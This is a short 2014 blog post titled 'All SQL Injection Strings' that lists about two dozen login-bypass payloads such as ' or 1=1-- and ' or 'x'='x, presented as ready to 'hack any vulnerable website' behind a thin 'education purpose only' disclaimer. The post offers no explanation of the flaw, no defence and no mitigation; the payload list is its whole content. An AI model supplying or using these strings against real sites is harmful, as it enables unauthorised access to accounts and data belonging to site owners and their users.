Thursday, August 7, 2014

All SQL Injection Strings


All SQL Injection Strings(Education Purpose Only)
These strings can be used to hack any vulnerable website having SQL at backhand.
Admin--
' or 0=0 --
" or 0=0 --
 or 0=0 --
 ' or 0=0 #
 " or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
 ') or('x'='x
' or 1=1--
" or 1=1--
 or 1=1--
' or a=a--
 ' or 'a'='a
 " or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
 hi" or 1=1 --
 hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
 hi") or ("a"="a
 Here are the strings through any vulnerable site can be hacked.
Bishal obroy s Suggesion: -“As I said this is just for education purpose only. Do not try it to break law in your country”

0 comments:

Post a Comment